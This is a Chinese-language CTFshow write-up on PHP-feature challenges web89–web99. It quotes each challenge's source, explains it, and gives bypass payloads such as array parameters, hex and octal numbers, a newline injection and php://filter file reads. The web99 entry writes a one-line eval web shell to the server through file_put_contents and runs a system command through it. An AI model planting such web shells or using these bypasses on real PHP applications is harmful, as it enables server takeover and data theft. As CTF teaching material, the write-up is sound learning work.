CTFshowPHP特性

目录

web89

代码分析

playload

web90

代码分析

playload

web91

代码分析

playload

web92

代码分析

playload

web93

代码分析

playload

web94

代码分析

playload

web95

web96

代码分析

playload

web97

代码分析

playload

web98

代码分析

playload

web99

代码分析

playload

---

web89

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);if(isset($_GET['num'])){$num = $_GET['num'];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}
}

代码分析

if(isset($_GET['num'])){   #检查参数是否为num，是则下一步

if(preg_match("/[0-9]/", $num)){die("no no no!");         #正则表达式是否包含数字0~9，如果包含则结束程序

if(intval($num)){  echo $flag;        #使用 intval 函数将 $num 转换为整数，如果转换后不为0则输出flag      

playload

这题我们用数组绕过

?num[]=

web90

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:06:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==="4476"){die("no no no!");}if(intval($num,0)===4476){echo $flag;}else{echo intval($num,0);}
}

代码分析

if($num==="4476"){die("no no no!");     #如果字符串=4476就结束程序

if(intval($num,0)===4476){echo $flag;           #使用 intval 函数将 $num 转换为整数，如果转换后为4476则输出flag

playload

可以用进制绕过

?num=0x117c

也可以用intval函数进行绕过

intval("4476a") 会返回 4476，而 intval("a4476") 会返回 0。
因此，即使 num 参数包含非数字字符，只要这些字符后面跟着数字 4476，intval 仍然会返回 4476

所以构造

?num=4476a

web91

<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:16:09
# @link: https://ctfer.com*/show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){if(preg_match('/^php$/i', $a)){echo 'hacker';}else{echo $flag;}
}
else{echo 'nonononono';
}

代码分析

$a=$_GET['cmd'];   #cmd 参数的值，赋值给变量 $a

if(preg_match('/^php$/im', $a)){  #使用preg_match函数检查 $a是否完全匹配字符串 php
'^php$'   #表示字符串必须从头到尾完全等于 php
im        #i 表示不区分大小写，m 表示多行模式

echo 'hacker';   #完全匹配字符串 php则输出hacker

if(preg_match('/^php$/i', $a)){echo 'hacker';}else{echo $flag;#如果 $a 完全匹配 php（不区分大小写），则输出 hacker，否则输出flag

else {echo 'nonononono';
}                         #如果 $a 不匹配 php，则输出 nonononono

playload

?cmd=%0aphp

web92

<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:29:30
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==4476){die("no no no!");}if(intval($num,0)==4476){echo $flag;}else{echo intval($num,0);}
}

代码分析

    }else{echo intval($num,0);     #如果条件不为4476，则输出转换后的整数值

playload

用进制绕过

?num=0x117c

web93

<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:32:58
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==4476){die("no no no!");}if(preg_match("/[a-z]/i", $num)){die("no no no!");}if(intval($num,0)==4476){echo $flag;}else{echo intval($num,0);}
} 

代码分析

if(preg_match("/[a-z]/i", $num)){    #使用正则表达式检查 $num 是否包含任何字母（不区分大小写）die("no no no!");}                           #如果 $num 包含字母，程序将立即终止，并输出 "no no no!"。

playload

可以用8进制数绕过

?num=010574

web94

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:46:19
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==="4476"){die("no no no!");}if(preg_match("/[a-z]/i", $num)){die("no no no!");}if(!strpos($num, "0")){die("no no no!");}if(intval($num,0)===4476){echo $flag;}
}

代码分析

与上题相比较，多了一个strpos函数

if(!strpos($num, "0")){die("no no no!");    #开头如果是数字0，则输出no no no!

playload

?num=+010574

可以用+来绕过

web95

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){$num = $_GET['num'];if($num==4476){die("no no no!");}if(preg_match("/[a-z]|\./i", $num)){die("no no no!!");}if(!strpos($num, "0")){die("no no no!!!");}if(intval($num,0)===4476){echo $flag;}
}

同上

web96

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com*/highlight_file(__FILE__);if(isset($_GET['u'])){if($_GET['u']=='flag.php'){die("no no no");}else{highlight_file($_GET['u']);}}

代码分析

if(isset($_GET['u'])){   #参数要为u

    if($_GET['u']=='flag.php'){die("no no no");    #如果参数u=flag.php则输出no no no

}else{highlight_file($_GET['u']); #如果参数u不等于flag.php，则highlight_file 函数高亮显示用户指定的文件内容。（报错）

playload

?u=php://filter/convert.base64-encode/resource=flag.php

直接用伪协议读取flag.php文件

?u=./flag.php

也可以绕过

web97

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 19:36:32
# @link: https://ctfer.com*/include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

代码分析

if (isset($_POST['a']) and isset($_POST['b'])) {#检查是否存在名为 a 和 b 的 POST 参数，

if ($_POST['a'] != $_POST['b'])  #检查 a 和 b 的值是否不相等

if (md5($_POST['a']) === md5($_POST['b']))  #检查 a 和 b 的md5值是否相等

playload

post数组绕过

a[]=1&b[]=2

web98

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 21:39:27
# @link: https://ctfer.com*/include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);?>

代码分析

$_GET?$_GET=&$_POST:'flag';   # 三元运算符，$_GET为真则执行$_GET=&$_POST，假则为flag

$_GET   $_GET['flag']   #数组

$_SERVER     #值为$_SERVER

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);  #如果get参数HTTP_FLAG的值为flag，就输出flag

$_GET 值为$_POST
如果$_GET 也就是$_POST['flag']=flag
$_GET = $_COOKIE
$_GET['flag'] = $_COOKIE['flag']
$_GET['flag'] = 'flag'

playload

get：?1=2 #这里似乎任何字符都可以

post：HTTP_FLAG=flag

web99

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com*/highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){file_put_contents($_GET['n'], $_POST['content']);
}?>

代码分析

if(isset($_GET['n']) && in_array($_GET['n'], $allow)){file_put_contents($_GET['n'], $_POST['content']);
}     #检查参数n是否存在，如果条件满足，
则使用 file_put_contents() 函数将 $_POST['content'] 的内容写入到文件 $_GET['n'] 中。

所以可以写入一句话木马

playload

get：?n=203.php

post：content=<?php @eval($_POST[1]);?>

1=system("tac flag36d.php");